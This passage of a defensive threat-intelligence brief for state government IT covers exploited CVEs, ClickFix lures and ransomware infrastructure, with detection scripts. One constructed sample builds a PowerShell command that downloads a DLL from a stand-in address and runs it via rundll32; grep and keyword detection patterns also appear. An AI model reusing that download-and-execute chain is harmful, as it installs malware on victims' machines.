<p> <strong> Threat Assessment Level: ELEVATED </strong> (trending toward HIGH)
</p>
<p> Two actively exploited vulnerabilities carry CISA KEV remediation deadlines this week (Drupal CVE-2026-9082 today, LiteSpeed cPanel CVE-2026-48172 on 29 May), and a third critical flaw, a Ghost CMS SQL injection, is under mass exploitation with 700+ sites hijacked. A structural shift in AI-assisted exploit discovery has compressed the window between vulnerability disclosure and weaponization. Meanwhile, the FBI's takedown of criminal VPN infrastructure used by roughly 25 ransomware groups offers only temporary relief; adversary migration to new infrastructure is expected within two weeks.
</p>
<p> State government IT leaders face a convergence of immediate patching obligations, evolving ransomware tradecraft, and a fundamental challenge to existing patch management timelines. This brief provides the intelligence and operational guidance needed to act decisively.
</p>
<h2> <strong> What Changed </strong>
</h2>
<table> <thead> <tr> <th> <p> <strong> Development </strong> </p> </th> <th> <p> <strong> Why It Matters for State Government </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> <strong> CISA adds CVE-2026-48172 to KEV </strong> (LiteSpeed cPanel Plugin, CVSS 9.8) </p> </td> <td> <p> Root-level privilege escalation actively exploited in the wild. Federal remediation deadline: <strong> 29 May 2026 </strong> . Any state agency using cPanel/LiteSpeed web hosting is exposed. </p> </td> </tr> <tr> <td> <p> <strong> Microsoft SharePoint RCE disclosed </strong> (CVE-2026-45659, CVSS 8.8) </p> </td> <td> <p> Authenticated users with basic Site Member permissions can execute arbitrary code. SharePoint's history of rapid KEV additions (CVE-2026-32201 added in April) makes exploitation likely. </p> </td> </tr> <tr> <td> <p> <strong> 700+ Ghost CMS sites hijacked </strong> (CVE-2026-26980, CVSS 9.4) </p> </td> <td> <p> Active SQL injection campaign since 7 May injects malicious JavaScript into legitimate websites, deploying ClickFix social engineering lures that trick visitors into pasting and running PowerShell commands on their own machines. </p> </td> </tr> <tr> <td> <p> <strong> Drupal CVE-2026-9082 KEV deadline: today </strong> (CVSS 9.8) </p> </td> <td> <p> 15,000+ exploitation attempts across 6,000 sites. CISA KEV remediation deadline is <strong> 27 May 2026 </strong> — any unpatched Drupal instance is overdue. </p> </td> </tr> <tr> <td> <p> <strong> FBI disrupts "First VPN Service" </strong> </p> </td> <td> <p> Criminal anonymization infrastructure used by ~25 ransomware groups since 2014 — taken down in international operation. Expect 7–14 day adversary migration period before operations resume on new infrastructure. </p> </td> </tr> <tr> <td> <p> <strong> Kali365 phishing platform confirmed </strong> </p> </td> <td> <p> FBI PSA confirms the platform defeats Microsoft 365 MFA via OAuth device code phishing: the victim completes sign-in and MFA on the genuine login page, and the attacker who started the flow receives the resulting tokens. State M365 tenants are high-value targets. </p> </td> </tr> <tr> <td> <p> <strong> AI achieves tier-5 autonomous exploit discovery </strong> </p> </td> <td> <p> Full OS vulnerability sweeps now cost &lt;$20,000. China's mandatory 48-hour disclosure pipeline (RMSV 2021) gives state-backed actors structured access to findings before public disclosure. Patching windows measured in weeks are no longer viable. </p> </td> </tr> <tr> <td> <p> <strong> Nation-state activity: Nimbus Manticore + Volt/Salt Typhoon </strong> </p> </td> <td> <p> Check Point documents Nimbus Manticore (IRGC/UNC1549) conducting AI-assisted campaigns targeting aviation, software, and government under Operation Epic Fury. Volt Typhoon and Salt Typhoon maintain pre-positioned access in U.S. critical infrastructure with no new indicators this cycle — absence is not reassurance. </p> </td> </tr> <tr> <td> <p> <strong> 6 ABB ICS advisories published </strong> </p> </td> <td> <p> Covering PLCs, SCADA runtime, EV chargers, and building automation — all systems deployed across state critical infrastructure. </p> </td> </tr> </tbody>
</table>
<h2> <strong> Threat Timeline </strong>
</h2>
<table> <thead> <tr> <th> <p> <strong> Date </strong> </p> </th> <th> <p> <strong> Event </strong> </p> </th> <th> <p> <strong> Impact </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 7 May 2026 </p> </td> <td> <p> Ghost CMS exploitation campaign begins (CVE-2026-26980) </p> </td> <td> <p> 700+ websites compromised with ClickFix JavaScript injection </p> </td> </tr> <tr> <td> <p> 20 May 2026 </p> </td> <td> <p> Drupal emergency patch for CVE-2026-9082 (CVSS 9.8) </p> </td> <td> <p> 15,000+ exploitation attempts across 6,000 sites; CISA KEV deadline 27 May </p> </td> </tr> <tr> <td> <p> 21 May 2026 </p> </td> <td> <p> LiteSpeed releases patch for CVE-2026-48172 </p> </td> <td> <p> Zero-day exploitation confirmed prior to patch availability </p> </td> </tr> <tr> <td> <p> 22 May 2026 </p> </td> <td> <p> CISA adds Drupal CVE-2026-9082 to KEV </p> </td> <td> <p> Federal agencies mandated to remediate by 27 May </p> </td> </tr> <tr> <td> <p> 25 May 2026 </p> </td> <td> <p> FBI PSA on Kali365 phishing platform </p> </td> <td> <p> Confirms complete Microsoft 365 MFA bypass via OAuth device code token theft </p> </td> </tr> <tr> <td> <p> 25 May 2026 </p> </td> <td> <p> Check Point publishes Nimbus Manticore (IRGC/UNC1549) analysis </p> </td> <td> <p> AI-assisted malware and SEO poisoning targeting aviation, software, government </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> CISA adds CVE-2026-48172 (LiteSpeed) to KEV </p> </td> <td> <p> Federal remediation deadline: 29 May 2026 </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> Microsoft discloses CVE-2026-45659 (SharePoint RCE) </p> </td> <td> <p> <strong> Authenticated RCE with low-privilege account; patch available </strong> </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> FBI announces "First VPN Service" takedown </p> </td> <td> <p> 32 exit nodes across 27 countries seized; 25 ransomware groups affected </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> 
Cato CTRL publishes AI zero-day economics brief </p> </td> <td> <p> Documents &lt;$20K full-OS exploit discovery; China's structured pipeline advantage </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> CISA publishes 6 ABB ICS advisories </p> </td> <td> <p> PLCs, SCADA, EV chargers, building automation affected </p> </td> </tr> </tbody>
</table>
<h2> <strong> Key Threat Analysis </strong>
</h2>
<h3> <strong> 1. LiteSpeed cPanel Root Escalation (CVE-2026-48172) — IMMEDIATE ACTION REQUIRED </strong>
</h3>
<p> A privilege escalation vulnerability in the LiteSpeed User-End cPanel Plugin (versions 2.3–2.4.4) allows arbitrary script execution with <strong> root privileges </strong> on hosting servers. CISA confirmed active exploitation as a zero-day prior to the 21 May patch. The vulnerability is tagged with espionage motivation targeting U.S. government infrastructure.
</p>
<p> <strong> What to look for: </strong> Any state agency web hosting environment running cPanel with LiteSpeed. Run this detection command across hosting infrastructure. A hit shows that the vulnerable API function was requested, not that the request succeeded, so pivot on the source address, cPanel account and HTTP status of each matching line, and treat any match dated before the 21 May patch as a potential compromise:
</p>
<pre><code>grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2&gt;/dev/null</code></pre>
<p> <strong> Fix: </strong> Upgrade to WHM Plugin 5.3.1.0 (bundles user-end plugin 2.4.7+). CISA deadline: <strong> 29 May 2026 </strong> .
</p>
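<p> The grep above answers "was the vulnerable function called anywhere?"; the triage question that follows is who called it, from where, whether the server answered 200, and whether the call landed in the pre-patch window that Hunting Hypothesis 1 below asks you to audit. The script here is an illustration added to this brief, not tooling from cPanel, LiteSpeed or CISA. It assumes the Apache-style line format cPanel writes to its access log (source IP, cPanel user, bracketed mm/dd/yyyy timestamp, quoted request, status) and the sample lines are constructed for the example. </p>

```python
"""Triage cPanel access logs for the CVE-2026-48172 request marker.

Illustrative code added to this brief, not tooling from cPanel or LiteSpeed.
Assumed log format (cPanel access_log, Apache-style):
  <ip> - <cpanel user> [<mm/dd/yyyy:HH:MM:SS zone>] "<request>" <status> ...
The sample lines below are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone

MARKER = "cpanel_jsonapi_func=redisAble"      # the string the brief's grep looks for
PRE_PATCH_END = datetime(2026, 5, 21, 23, 59, 59, tzinfo=timezone.utc)  # patch released 21 May

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

def parse_ts(raw):
    """cPanel writes mm/dd/yyyy; tolerate Apache's dd/Mon/yyyy as well."""
    for fmt in ("%m/%d/%Y:%H:%M:%S %z", "%d/%b/%Y:%H:%M:%S %z"):
        try:
            return datetime.strptime(raw, fmt)
        except ValueError:
            continue
    return None

def find_hits(lines):
    """One record per log line that references the vulnerable function."""
    hits = []
    for line in lines:
        if MARKER not in line:
            continue
        m = LINE_RE.match(line)
        if not m:                       # unexpected format: keep the raw line for manual review
            hits.append({"parsed": False, "raw": line})
            continue
        ts = parse_ts(m["ts"])
        hits.append({
            "parsed": True, "ip": m["ip"], "user": m["user"], "ts": ts,
            "status": int(m["status"]), "request": m["req"],
            "pre_patch": ts is not None and ts <= PRE_PATCH_END,
        })
    return hits

def summarize(hits):
    """Group by source IP: call count, cPanel accounts used, HTTP 200 responses,
    and how many calls fell in the pre-patch window (when the host was exploitable)."""
    by_src = defaultdict(lambda: {"count": 0, "users": set(), "http_200": 0, "pre_patch": 0})
    for h in hits:
        if not h["parsed"]:
            continue
        s = by_src[h["ip"]]
        s["count"] += 1
        s["users"].add(h["user"])
        s["http_200"] += h["status"] == 200
        s["pre_patch"] += h["pre_patch"]
    return dict(by_src)

# --- constructed sample log lines (RFC 5737 test addresses) -------------------
SAMPLE_LINES = [
    '203.0.113.5 - webuser1 [05/18/2026:02:14:07 -0000] "GET /cpsess9876543210/json-api/cpanel?cpanel_jsonapi_module=LiteSpeed&cpanel_jsonapi_func=redisAble HTTP/1.1" 200 0 "" "python-requests/2.31"',
    '203.0.113.5 - webuser1 [05/18/2026:02:14:09 -0000] "POST /cpsess9876543210/json-api/cpanel?cpanel_jsonapi_module=LiteSpeed&cpanel_jsonapi_func=redisAble HTTP/1.1" 200 0 "" "python-requests/2.31"',
    '198.51.100.7 - webuser2 [05/23/2026:11:05:44 -0000] "GET /cpsess1122334455/json-api/cpanel?cpanel_jsonapi_module=LiteSpeed&cpanel_jsonapi_func=redisAble HTTP/1.1" 403 0 "" "Mozilla/5.0"',
    '192.0.2.9 - webuser2 [05/23/2026:11:06:00 -0000] "GET /cpsess1122334455/execute/Email/list_pops HTTP/1.1" 200 512 "" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, s in summarize(find_hits(SAMPLE_LINES)).items():
        print(ip, s)
```

<p> In the constructed sample the two pre-patch calls from 203.0.113.5 that returned 200 are the ones to escalate; the post-patch 403 from 198.51.100.7 is a blocked probe. Feed the real logs in with <code>find_hits(open(path))</code> per file, and carry the source IP and cPanel account into the cron-job and authorized_keys checks in Hunting Hypothesis 1. </p>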
<h3> <strong> 2. Microsoft SharePoint Server RCE (CVE-2026-45659) </strong>
</h3>
<p> A deserialization vulnerability allows any authenticated user with Site Member permissions to execute arbitrary code on SharePoint Server. While Microsoft currently assesses exploitation as "less likely," SharePoint has a documented pattern of rapid escalation — CVE-2026-32201 was added to the KEV catalog in April 2026. Post-exploitation typically involves web shell deployment for persistent access.
</p>
<p> <strong> Affected systems: </strong> SharePoint Server Subscription Edition, SharePoint Server 2019, SharePoint Enterprise Server 2016 — all common in state government hybrid environments connected to Microsoft 365.
</p>
<p> <strong> Risk assessment: </strong> The low privilege requirement (Site Member, not Site Owner or Admin) dramatically expands the attack surface. Any compromised standard user account becomes a path to server-level code execution.
</p>
<h3> <strong> 3. Ghost CMS Mass Compromise Campaign (CVE-2026-26980) </strong>
</h3>
<p> Since 7 May, attackers have exploited a critical SQL injection (CVSS 9.4) in Ghost CMS to hijack 700+ websites. The attack chain is sophisticated:
</p>
<ol> <li> <strong> Initial access: </strong> Unauthenticated SQL injection steals Admin API keys from the database </li> <li> <strong> Content injection: </strong> Malicious JavaScript injected into published articles </li> <li> <strong> Social engineering: </strong> Visitors see fake CAPTCHA/Cloudflare "ClickFix" screens </li> <li> <strong> Payload delivery: </strong> Victims unknowingly execute Base64-encoded PowerShell commands </li> <li> <strong> Execution: </strong> Payload delivered via rundll32.exe or trojanized Electron application installer </li>
</ol>
<p> Any state agency running Ghost CMS versions 3.24.0 through 6.19.0 for public-facing websites is vulnerable. The campaign weaponizes trusted .gov content against citizens visiting legitimate state websites.
</p>
<h3> <strong> 4. Ransomware Ecosystem: Disruption and Adaptation </strong>
</h3>
<p> The FBI's takedown of "First VPN Service" — a criminal anonymization network operating since 2014 across 32 exit nodes in 27 countries — temporarily degrades the operational capability of approximately 25 ransomware groups. The service was advertised exclusively on underground forums Exploit[.]in and XSS[.]is, using protocols designed to evade detection:
</p>
<ul> <li> <strong> VLESS/Reality </strong> — disguises VPN traffic as legitimate HTTPS </li> <li> <strong> WireGuard, OpenConnect, Outline </strong> — standard encrypted tunneling </li> <li> <strong> OpenVPN ECC, L2TP/IPSec </strong> — legacy protocol support </li>
</ul>
<p> <strong> Key actors affected: </strong> Groups in the Avaddon/NoEscape ransomware lineage. The Abyss Locker ransomware operation — which specifically exploits VPN appliances for initial access before deploying ransomware against virtualized infrastructure — operates within this same ecosystem.
</p>
<p> <strong> Forecast: </strong> Expect a 7–14 day operational pause followed by migration to alternative anonymization infrastructure. State government remains a high-value ransomware target due to political visibility, citizen data holdings, and budget-constrained patching timelines.
</p>
<h3> <strong> 5. AI-Accelerated Exploit Discovery: A Structural Shift </strong>
</h3>
<p> The most strategically significant finding this cycle is not a single vulnerability but a permanent change in threat economics:
</p>
<ul> <li> <strong> Anthropic's Claude Mythos Preview </strong> achieved autonomous tier-5 control-flow hijack exploits, including a 27-year-old OpenBSD TCP SACK bug and FreeBSD NFS CVE-2026-4747 </li> <li> <strong> China's Qihoo 360 </strong> claims ~1,000 vulnerabilities discovered via AI-assisted methods </li> <li> <strong> Cost: </strong> A full operating system vulnerability sweep now costs under $20,000 </li> <li> <strong> China's advantage: </strong> The Regulations on Management of Security Vulnerabilities (RMSV 2021) mandate 48-hour disclosure to MIIT, which routes findings to MSS — giving state-backed actors (Volt Typhoon, Salt Typhoon) structured access to exploits before vendors or defenders are notified </li>
</ul>
<p> <strong> Implication for state government: </strong> The assumption that "no public proof-of-concept equals low risk" is no longer valid. Legacy systems previously considered "too obscure to target" — older FreeBSD deployments, embedded network stacks, niche SCADA firmware — are now economically viable targets for AI-assisted discovery.
</p>
<h3> <strong> 6. Nation-State Pre-Positioning: Quiet but Not Gone </strong>
</h3>
<p> <strong> Volt Typhoon </strong> (China) and <strong> Salt Typhoon </strong> (China) — both documented as pre-positioning within U.S. critical infrastructure for potential disruption during geopolitical crisis — have not generated new campaign indicators this cycle. This absence is notable, not reassuring. These actors specialize in living-off-the-land techniques (legitimate tools, valid credentials, no malware signatures) that evade traditional detection. The persistent OSINT collection gap may also be masking reporting on their activity.
</p>
<p> <strong> Nimbus Manticore </strong> (IRGC-affiliated, also tracked as UNC1549) was documented on 25 May conducting AI-assisted malware campaigns and SEO poisoning under Operation Epic Fury targeting aviation, software, and government sectors.
</p>
<h2> <strong> Predictive Analysis </strong>
</h2>
<table> <thead> <tr> <th> <p> <strong> Scenario </strong> </p> </th> <th> <p> <strong> Probability </strong> </p> </th> <th> <p> <strong> Timeframe </strong> </p> </th> <th> <p> <strong> Basis </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> Ransomware groups resume operations on new anonymization infrastructure after First VPN takedown </p> </td> <td> <p> <strong> HIGH (85%) </strong> </p> </td> <td> <p> 7–14 days </p> </td> <td> <p> Historical pattern: criminal infrastructure rebuilds rapidly; 25 groups have strong financial motivation </p> </td> </tr> <tr> <td> <p> CVE-2026-45659 (SharePoint RCE) added to CISA KEV catalog </p> </td> <td> <p> <strong> MODERATE-HIGH (65%) </strong> </p> </td> <td> <p> 14–30 days </p> </td> <td> <p> SharePoint KEV precedent (CVE-2026-32201 added April 2026); low exploitation barrier; high-value target </p> </td> </tr> <tr> <td> <p> Ghost CMS ClickFix campaign expands to target .gov websites </p> </td> <td> <p> <strong> MODERATE (55%) </strong> </p> </td> <td> <p> 7–21 days </p> </td> <td> <p> 700+ sites already compromised; campaign is automated and scaling; any unpatched Ghost instance is at risk </p> </td> </tr> <tr> <td> <p> AI-discovered zero-days exploited against state infrastructure without prior public disclosure </p> </td> <td> <p> <strong> MODERATE (50%) </strong> </p> </td> <td> <p> 30–90 days </p> </td> <td> <p> China's RMSV pipeline provides structural advantage; &lt;$20K discovery cost removes economic barrier </p> </td> </tr> <tr> <td> <p> Volt Typhoon activity detected in state/local government networks </p> </td> <td> <p> <strong> MODERATE (45%) </strong> </p> </td> <td> <p> 30–60 days </p> </td> <td> <p> 22+ days without new indicators despite known pre-positioning; detection may lag due to LOTL techniques </p> </td> </tr> <tr> <td> <p> Kali365 phishing platform used against state M365 tenants </p> </td> <td> <p> <strong> MODERATE (50%) </strong> </p> </td> <td> <p> 7–30 days </p> </td> 
<td> <p> FBI PSA confirms the device code technique defeats MFA in practice; state government M365 deployments are high-value targets </p> </td> </tr> </tbody>
</table>
<h2> <strong> SOC Operational Guidance </strong>
</h2>
<h3> <strong> Detection Priorities </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> ATT&amp;CK Technique </strong> </p> </th> <th> <p> <strong> What to Hunt </strong> </p> </th> <th> <p> <strong> Detection Approach </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> <strong> T1068 </strong> — Exploitation for Privilege Escalation </p> </td> <td> <p> LiteSpeed cPanel exploitation artifacts </p> </td> <td> <p> Search cPanel logs for cpanel_jsonapi_func=redisAble; monitor for unexpected root-level process creation on web hosting servers </p> </td> </tr> <tr> <td> <p> <strong> T1190 </strong> — Exploit Public-Facing Application </p> </td> <td> <p> SharePoint deserialization, Ghost CMS SQL injection, LiteSpeed exploitation </p> </td> <td> <p> WAF alerts on serialized object payloads to SharePoint endpoints; SQL injection signatures against Ghost Content API (/ghost/api/content/) </p> </td> </tr> <tr> <td> <p> <strong> T1059.001 </strong> — PowerShell </p> </td> <td> <p> ClickFix payload execution from Ghost CMS campaign </p> </td> <td> <p> Alert on powershell.exe spawned by browser processes or by explorer.exe (the Run dialog that ClickFix lures direct victims to); Base64-encoded command lines &gt;500 characters, decoded and inspected rather than matched on length alone; PowerShell downloading and executing DLLs </p> </td> </tr> <tr> <td> <p> <strong> T1218.011 </strong> — Rundll32 </p> </td> <td> <p> ClickFix second-stage payload </p> </td> <td> <p> rundll32.exe executing DLLs from user temp directories or download folders; unsigned DLLs loaded by rundll32 </p> </td> </tr> <tr> <td> <p> <strong> T1090 </strong> — Proxy / T1133 — External Remote Services </p> </td> <td> <p> Ransomware groups using anonymization protocols </p> </td> <td> <p> VLESS/Reality tunnels on port 443 (Reality relays a genuine third-party TLS handshake and its clients mimic browser fingerprints, so treat JA3/JA4 anomalies as one weak signal and corroborate with destination reputation, SNI/destination mismatches and flow duration and volume); unauthorized WireGuard/OpenConnect sessions </p> </td> </tr> <tr> <td> <p> <strong> T1505.003 </strong> — Web Shell </p> </td> <td> <p> SharePoint post-exploitation persistence </p> </td> <td> <p> New .aspx files in SharePoint web directories; unexpected IIS worker process spawning cmd.exe or PowerShell </p> </td> </tr> 
<tr> <td> <p> <strong> T1078 </strong> — Valid Accounts </p> </td> <td> <p> Credential abuse via stolen tokens (Kali365, First VPN) </p> </td> <td> <p> Impossible travel alerts; authentication from known VPN/proxy ASNs; OAuth device code flow from unexpected locations </p> </td> </tr> <tr> <td> <p> <strong> T0831 </strong> — Manipulation of Control </p> </td> <td> <p> ABB ICS exploitation </p> </td> <td> <p> Anomalous commands to ABB AC500 V2 PLCs; unexpected firmware update attempts on ABB Terra AC chargers; Zenon runtime crashes </p> </td> </tr> </tbody>
</table>
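<p> The T1059.001 and T1218.011 rows above, and the ClickFix chain in section 3, describe the detection in words; the script below runs it over process-creation telemetry. It is an illustration added to this brief, not a vendor rule or the campaign's actual payload. It assumes events shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the events, the download URL and the encoded script are constructed for the example, with the encoding done the way PowerShell expects (UTF-16LE, then Base64) so the decoder is exercised on a realistic argument. </p>

```python
"""Detect the ClickFix execution chain in process-creation telemetry.

Illustrative code added to this brief; not from any vendor. Events are dicts
shaped like Sysmon Event ID 1 fields and are constructed for the example; the
encoded payload is built here by encoding a constructed script the way
PowerShell expects it (UTF-16LE, then base64).
"""
import base64
import re
from pathlib import PureWindowsPath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
RUN_DIALOG_PARENT = "explorer.exe"        # Win+R, where ClickFix lures tell victims to paste
SUSPECT_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\inetcache\\", "\\cache\\")
URL_RE = re.compile(r"https?://[^\s'\"]+")

def _basename(path):
    return PureWindowsPath(path).name.lower()

def extract_encoded(cmd):
    """Return the argument of -EncodedCommand, accepting any prefix (-e, -ec, -enc, ...)."""
    toks = cmd.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            return toks[i + 1]
    return None

def decode_encoded(b64):
    """PowerShell -EncodedCommand is base64 over UTF-16LE text."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(events):
    """Return one alert per event matching the ClickFix stage-1 or stage-2 pattern."""
    alerts = []
    for ev in events:
        img, parent, cmd = _basename(ev["Image"]), _basename(ev["ParentImage"]), ev["CommandLine"]
        if img in ("powershell.exe", "pwsh.exe"):
            enc = extract_encoded(cmd)
            user_launched = parent in BROWSERS or parent == RUN_DIALOG_PARENT
            if enc and user_launched:
                decoded = decode_encoded(enc) or ""
                alerts.append({
                    "rule": "T1059.001 encoded PowerShell from user-facing parent",
                    "parent": parent,
                    "long_encoded": len(enc) > 500,          # the brief's coarse threshold
                    "decoded": decoded,                       # what the victim actually ran
                    "urls": URL_RE.findall(decoded),          # payload hosts to block/hunt
                    "stages_rundll32": "rundll32" in decoded.lower(),
                })
        elif img == "rundll32.exe":
            if any(d in cmd.lower() for d in SUSPECT_DIRS):
                alerts.append({"rule": "T1218.011 rundll32 loading DLL from user-writable path",
                               "parent": parent, "command": cmd})
    return alerts

# --- constructed sample telemetry (RFC 5737 address, fictitious paths) ---------
_FAKE_SCRIPT = r"""$u='http://203.0.113.20/dl/abc.dll';$p="$env:TEMP\abc.dll";iwr $u -OutFile $p;rundll32 $p,Start # I am not a robot - reCAPTCHA Verification ID: 7829"""
SAMPLE_ENC = base64.b64encode(_FAKE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc " + SAMPLE_ENC},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\abc.dll,Start"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign scheduled script
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\ProgramData\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(a["rule"], "|", a.get("urls") or a.get("command"))
```

<p> Two design points. The parent check includes explorer.exe because the classic ClickFix lure has the victim press Win+R and paste, so the PowerShell process is a child of the Run dialog's host rather than of the browser. And the encoded argument is decoded rather than length-matched: the constructed payload here is well under 500 characters yet still downloads a DLL and hands it to rundll32, which is exactly the chain the brief describes, and the decoded text yields the URL you need for blocking. </p>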
<h3> <strong> Hunting Hypotheses </strong>
</h3>
<ol> <li> <strong> Hypothesis: </strong> State web hosting infrastructure running cPanel/LiteSpeed has been compromised via CVE-2026-48172 prior to patch availability. <ul> <li> <strong> Hunt: </strong> Audit all cPanel access logs for the period 1–21 May 2026 (pre-patch window). Look for privilege escalation indicators, new cron jobs running as root, unauthorized SSH keys added. </li> </ul> </li> <li> <strong> Hypothesis: </strong> A compromised Site Member account is being used to stage SharePoint exploitation. <ul> <li> <strong> Hunt: </strong> Review SharePoint ULS logs for deserialization errors or unusual API calls from accounts that recently had password resets or MFA challenges. Check for new .aspx files in SharePoint hives. </li> </ul> </li> <li> <strong> Hypothesis: </strong> State agency Ghost CMS instances have been injected with malicious JavaScript. <ul> <li> <strong> Hunt: </strong> Crawl all state .gov Ghost CMS sites for injected &lt;script&gt; tags not present in source templates. Check for unauthorized Admin API key generation in Ghost logs. </li> </ul> </li> <li> <strong> Hypothesis: </strong> Ransomware operators are probing state VPN appliances for initial access following First VPN Service disruption. <ul> <li> <strong> Hunt: </strong> Correlate VPN authentication failures with known ransomware TTP patterns: brute force attempts (T1110) followed by successful authentication from new source IPs, especially from residential proxy ranges. </li> </ul> </li>
</ol>
<h3> <strong> Blocking Guidance </strong>
</h3>
<ul> <li> Block or alert on VLESS/Reality tunnels at the perimeter. Caveat: Reality is built to present a genuine third-party site's TLS handshake and its clients mimic browser fingerprints, so JA3/JA4 alone is a weak signal; combine fingerprint anomalies with destination reputation, SNI/destination mismatches and long-lived, high-volume flows to unfamiliar hosts </li> <li> Alert on authentication attempts from ASN 399629 (BL Networks, associated with First VPN Service) </li> <li> Block rundll32.exe execution of DLLs from %TEMP%, %USERPROFILE%\Downloads, and browser cache directories </li> <li> Deploy a strict Content Security Policy on all state Ghost CMS instances (a script-src without 'unsafe-inline', using nonces or hashes for the theme's own inline scripts) so injected inline JavaScript is inert in enforcing browsers. CSP does not remove the injected content or recover stolen Admin API keys; it complements patching and key rotation rather than replacing them </li>
</ul>
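<p> Hunting Hypothesis 3 and the CSP item above both come down to the same mechanics: diff the scripts on a live Ghost page against the known-good template, and know whether your policy would actually stop what was injected. The script below does both. It is an illustration added to this brief, not Ghost's tooling; the two HTML documents, the host name www.example.gov and the two policies are constructed, and the CSP check is deliberately an approximation (it models 'self', 'unsafe-inline', nonces and host sources, not hashes or 'strict-dynamic'). </p>

```python
"""Find scripts injected into a Ghost-rendered page; check whether a CSP would neutralise them.

Illustrative code added to this brief, not Ghost's own tooling. The HTML documents,
host name and CSP strings are constructed for the example. Only the script-src
sources 'self', 'unsafe-inline', 'nonce-...' and host names are modelled.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Collect every <script> element as {src, inline, nonce}."""
    def __init__(self):
        super().__init__()
        self.scripts, self._in, self._buf, self._attrs = [], False, [], {}
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in, self._buf, self._attrs = True, [], dict(attrs)
    def handle_data(self, data):
        if self._in:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in:
            body = "".join(self._buf).strip()
            self.scripts.append({"src": self._attrs.get("src"), "inline": body or None,
                                 "nonce": self._attrs.get("nonce")})
            self._in = False

def _key(script):
    # nonces rotate per response, so inline scripts are keyed by body hash, never by nonce
    if script["src"]:
        return ("src", script["src"])
    return ("inline", hashlib.sha256((script["inline"] or "").encode()).hexdigest())

CLICKFIX_HINTS = ("clipboard", "atob(", "powershell", "verify you are human", "win+r", "fromcharcode")

def find_injected(baseline_html, live_html):
    """Scripts in the live page that the known-good template does not contain, with lure hints."""
    base, live = ScriptCollector(), ScriptCollector()
    base.feed(baseline_html)
    live.feed(live_html)
    known = {_key(s) for s in base.scripts}
    out = []
    for s in live.scripts:
        if _key(s) in known:
            continue
        text = (s["inline"] or s["src"] or "").lower()
        out.append({**s, "hints": [h for h in CLICKFIX_HINTS if h in text]})
    return out

def script_src_sources(policy):
    for directive in policy.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "script-src":
            return parts[1:]
    return None

def csp_allows(script, policy, site_host="www.example.gov"):
    """Would an enforcing browser execute this script under the policy? (approximation)"""
    sources = script_src_sources(policy)
    if sources is None:
        return True                               # no script-src directive: scripts unrestricted
    if script["inline"] is not None:
        if "'unsafe-inline'" in sources:
            return True
        return script["nonce"] is not None and f"'nonce-{script['nonce']}'" in sources
    host = urlparse(script["src"]).hostname or site_host   # relative src => same origin
    for src in sources:
        if src == "'self'" and host == site_host:
            return True
        if not src.startswith("'") and urlparse(src if "://" in src else "//" + src).hostname == host:
            return True
    return False

# --- constructed sample pages and policies -----------------------------------
BASELINE_HTML = """<!doctype html><html><head>
<script nonce="r4nd0m">window.ghostTheme={ver:"1.0"};</script>
<script src="/assets/built/main.js"></script>
</head><body><article>Public health notice</article></body></html>"""

LIVE_HTML = BASELINE_HTML.replace("</article>",
    "</article><script>/* fake Cloudflare check */ document.body.innerHTML='Verify you are human';"
    " navigator.clipboard.writeText(atob('Y29uc3RydWN0ZWQ='));</script>")   # base64 of "constructed"

STRICT_CSP = "default-src 'self'; script-src 'self' 'nonce-r4nd0m'"
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.net"

if __name__ == "__main__":
    for s in find_injected(BASELINE_HTML, LIVE_HTML):
        print("injected:", s["hints"], "| runs under strict CSP:", csp_allows(s, STRICT_CSP),
              "| under weak CSP:", csp_allows(s, WEAK_CSP))
```

<p> The baseline should be rendered from the theme in a clean environment (or from a pre-7-May crawl), because the campaign injects into published content rather than theme files, so a file-level diff of the theme misses it. The CSP comparison shows the point the blocking item makes: the same injected script is inert under the nonce-based policy and runs under one that carries 'unsafe-inline'. </p>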
<h2> <strong> Sector-Specific Defensive Priorities </strong>
</h2>
<h3> <strong> Financial Services (State Treasury, Revenue, Pension Systems) </strong>
</h3>
